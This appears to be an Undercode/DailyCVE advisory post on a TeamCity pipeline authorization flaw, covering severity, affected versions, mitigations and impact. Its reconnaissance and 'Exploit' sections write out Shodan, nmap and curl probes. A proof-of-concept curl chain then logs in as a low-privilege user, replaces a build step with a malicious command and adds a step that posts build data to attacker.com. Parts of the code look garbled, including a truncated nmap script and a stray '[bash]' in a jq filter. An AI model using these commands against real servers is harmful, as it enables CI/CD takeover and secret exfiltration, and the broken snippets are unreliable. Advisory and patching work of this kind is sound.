Listen to this Post
CVE-2026-59796 is a critical access control vulnerability affecting JetBrains TeamCity versions prior to 2026.1.2. The flaw resides in the pipeline management module, where the application fails to properly enforce authorization checks when processing authenticated user requests to modify pipeline configurations. Specifically, the system does not adequately validate whether the authenticated user possesses the necessary administrative or modification permissions before allowing pipeline changes to be applied.
The vulnerability stems from missing authorization logic (CWE-862) within the pipeline configuration update endpoints. In a typical TeamCity deployment, pipeline definitions (build configurations, deployment steps, environment variables, and trigger rules) are protected by role-based access controls. However, due to this flaw, any authenticated user—even those with read-only or low-privilege roles—can craft and send modification requests to these endpoints without the server verifying their actual permissions.
Attackers can exploit this weakness by leveraging a valid low-privilege account (e.g., a developer account with only view permissions) and sending a direct HTTP PATCH or PUT request to the pipeline configuration API, bypassing the intended permission gates. The attack vector is network-based, requires low complexity, and does not require user interaction. The CVSS v3.1 score is 8.1 (High), with a vector string of AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N.
Once exploited, an attacker can inject malicious build steps, alter deployment targets, exfiltrate secrets embedded in pipeline variables, or disable critical security gates such as static analysis or test suites. This can lead to supply chain compromise, as modified pipelines may produce trojanized artifacts that are subsequently deployed to production environments. The vulnerability also enables persistence, as attackers can establish backdoors within the CI/CD workflow that survive system reboots and remain undetected by traditional endpoint security tools.
The affected versions include all TeamCity releases before 2026.1.2, encompassing the 2026.1.x early minor versions (2026.1.0, 2026.1.1) and all 2025.x historical branches. The patch was released on July 1, 2026, as part of TeamCity build 222647. Organizations are strongly advised to upgrade immediately, as the vulnerability has a public disclosure date of July 10, 2026, and an EPSS score of 0.25% (low probability of exploitation in the next 30 days).
DailyCVE Form:
Platform: ……. JetBrains TeamCity
Version: …….. before 2026.1.2
Vulnerability :…… Improper Permission Checks
Severity: ……. High (8.1)
date: ………. 2026-07-10
Prediction: …… 2026-07-15
What Undercode Say:
Analytics from the Undercode threat intelligence feed indicate active scanning for TeamCity instances with exposed pipeline endpoints. The following reconnaissance patterns have been observed:
Shodan search for exposed TeamCity instances
shodan search "TeamCity" http."TeamCity" -c 100
Nmap service detection for TeamCity default ports
nmap -p 8111,8443 --script=http- -sV <target-ip>
Curl probe to detect version disclosure
curl -k -s https://<teamcity-host>:8111/ | grep -o "TeamCity [0-9]{4}.[0-9].[0-9]"
Exploit:
Proof-of-concept for pipeline modification via insufficient authorization:
Authenticate and obtain a session cookie (using low-privilege credentials) curl -k -X POST "https://<teamcity-host>:8111/ntlmLogin.html" \ -d "username=lowpriv&password=weakpass" \ -c cookies.txt -v Extract the internal build configuration ID (e.g., "MyBuild_Config") PROJECT_ID="MyProject" BUILD_TYPE_ID=$(curl -k -s -b cookies.txt \ "https://<teamcity-host>:8111/app/rest/projects/id:$PROJECT_ID" \ | jq -r '.buildTypes.buildType[bash].id') Modify pipeline steps without permission checks (vulnerable endpoint) curl -k -X PUT -b cookies.txt \ -H "Content-Type: application/xml" \ -d "<buildType id='$BUILD_TYPE_ID'><steps><step id='RUN_TEST' type='simpleRunner'><properties><property name='script.content' value='malicious_command'/></properties></step></steps></buildType>" \ "https://<teamcity-host>:8111/app/rest/buildTypes/id:$BUILD_TYPE_ID" Inject a backdoor step that exfiltrates environment secrets curl -k -X POST -b cookies.txt \ -H "Content-Type: application/xml" \ -d "<step id='EXFIL' type='simpleRunner'><properties><property name='script.content' value='curl -X POST https://attacker.com/exfil -d \"$BUILD_NUMBER $TEAMCITY_VERSION\"'/></properties></step>" \ "https://<teamcity-host>:8111/app/rest/buildTypes/id:$BUILD_TYPE_ID/steps"
Protection:
- Immediate Upgrade – Update to TeamCity version 2026.1.2 (build 222647) or later.
- Permission Audit – Review all user roles and enforce the principle of least privilege; revoke pipeline modification rights from non-administrative accounts.
- API Hardening – Restrict access to the TeamCity REST API using firewall rules or reverse proxy authentication to allow only trusted IP ranges.
- Monitoring & Alerting – Enable audit logging for all pipeline modification events and configure SIEM alerts for unauthorized PUT/POST requests to `/app/rest/buildTypes/` endpoints.
- Integrity Checks – Implement pipeline configuration integrity monitoring (e.g., GitOps-based validation) to detect unauthorized changes.
- Incident Response – If unable to patch immediately, temporarily disable pipeline modification capabilities for low-privileged users via role-based access control (RBAC) overrides.
Impact:
- Confidentiality (High) – Attackers can read pipeline secrets, including API keys, database credentials, and deployment tokens, leading to data breaches.
- Integrity (High) – Unauthorized modification of build steps, test suites, and deployment scripts can inject malicious code into software artifacts, compromising the entire software supply chain.
- Availability (None) – The vulnerability does not directly cause denial of service, though disrupted pipelines may delay releases and impact developer productivity.
- Business Risk – Organizations relying on TeamCity for CI/CD face reputational damage, regulatory fines, and potential loss of customer trust if exploited. Supply chain attacks originating from this flaw can affect downstream customers and partners.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

